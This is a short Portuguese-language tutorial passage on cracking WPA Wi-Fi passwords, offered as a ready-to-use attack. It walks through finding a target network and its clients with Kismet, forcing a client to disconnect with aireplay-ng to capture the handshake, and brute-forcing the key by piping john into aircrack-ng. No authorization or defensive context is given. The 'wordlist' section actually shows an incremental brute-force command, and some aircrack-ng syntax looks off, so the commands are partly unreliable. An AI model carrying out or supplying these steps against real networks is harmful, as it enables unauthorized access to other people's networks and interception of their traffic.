Na criptografia WPA serão necessárias mais algumas ferramentas, contudo capture o handshake e use-o para a descriptografia juntamente com ferramentas de força bruta ou wordlists.

Para dar início a quebra da criptografia, utilize novamente o Kismet, pelo terminal, e identifique todas as informações precisas da rede, tais como SSID, BSSID, tipo de chave, canal utilizado dentre outras. Para visualizar os clientes que se encontram conectados à rede, pressione a tecla "c".

Após a visualização dos clientes conectados, selecione um endereço mac de um cliente conectado para forçar a "desautenticação" seguida da captura dos handshakes, com os comandos a seguir:

# airmon-ng start <interface de rede> <canal>
# airodump-ng -w <nome do arquivo> -c <canal> <interface>
# aireplay-ng -0 1 -a <MAC DO AP> -c <MAC DO CLIENTE> <interface de rede>

Usando ataque de força bruta:

# john -incremental=digits --stdout | aircrack-ng -b <MAC DO ACCESS POINT> -w -<NOME DO ARQUIVO.cap>

Usando WORDLIST e mesclando com john:

# john --stdout --incremental:all | aircrack-ng -b <MAC DO ACCESS POINT> -w -<NOME DO ARQUIVO*.cap> Existem também outros tipos de ferramentas de ataque customizado que exigem um pouco mais de conhecimento do atacante.